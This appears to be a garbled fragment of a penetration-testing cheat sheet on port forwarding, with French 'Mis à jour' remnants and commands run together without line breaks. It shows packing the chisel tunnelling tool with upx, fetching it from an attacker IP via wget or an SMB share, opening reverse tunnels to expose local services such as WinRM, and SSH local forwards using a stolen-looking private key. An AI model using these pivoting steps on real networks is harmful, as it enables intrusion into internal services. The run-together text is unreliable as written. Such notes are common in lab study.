Port Forwarding Techniques
netstat -tuln
netstat -ano | findstr LISTENINGChisel:
Linux


Windows


SSH:

Mis à jour
netstat -tuln
netstat -ano | findstr LISTENING




Mis à jour
git clone https://github.com/jpillora/chiselgo build -ldflags "-s -w" .
upx chiselpython3 -m http.server 8080
wget http://10.10.14.4:8080/chisel./chisel server -p 8888 -reverse./chisel client 10.10.14.4:8888 R:631:127.0.0.1:631copy \\10.10.14.3\smb\chisel-windows.exe chisel-windows.exe./chisel-linux server -p 8888 -reversechisel-windows.exe client 10.10.14.3:8888 R:5985:127.0.0.1:5985chmod 600 id_rsasudo ssh -L 8086:127.0.0.1:8086 -L 8443:127.0.0.1:8443 -L 5000:127.0.0.1:5000 [email protected] -i id_rsa